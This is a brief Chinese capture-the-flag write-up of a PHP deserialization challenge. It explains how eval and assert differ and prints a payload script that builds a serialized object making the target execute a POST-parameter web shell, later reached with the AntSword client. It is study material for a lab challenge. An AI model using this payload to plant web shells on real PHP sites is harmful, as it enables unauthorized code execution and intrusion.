每天一题,记录学习
首先注意到的就是右键看不了源码,那就直接抓包来看,可恶,注意到有一个隐藏的 <a href="./time.php?source"></a> 标签 去访问这个./time.php?source 看看,很明显就是一道反序列化的题目 代码很简单,就是$a 和$b 形成嵌套$b($a) 来执行就行了
注意一下eval和assert的区别
eval 和assert 二者都可以执行PHP语句。只不过是,eval规范更加严格一些,必须符合PHP代码要求。而assert则没有那么严格,执行PHP表达式即可。
eval 函数把字符串按照 PHP 代码来计算 (执行),该字符串必须是合法的 PHP 代码,且必须以分号结尾 。 如eval(“echo 1;”) 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false
assert 函数功能是判断一个表达式是否成立,返回true or false,重点是函数会执行此表达式 。如果表达式为函数如assert(“echo(1)”),则会输出1,而如果为assert(“echo 1;”)则不会有输出。
payload
<?php
class HelloPhp
{
public $a='eval($_POST[360])';
public $b='assert';
}
$c = new HelloPhp;
echo serialize($c);
这个时候如果你和我一样去用蚁剑去连,会发现啥也没有都是空【无语】 因为flag 就藏在phpinfo() 里
|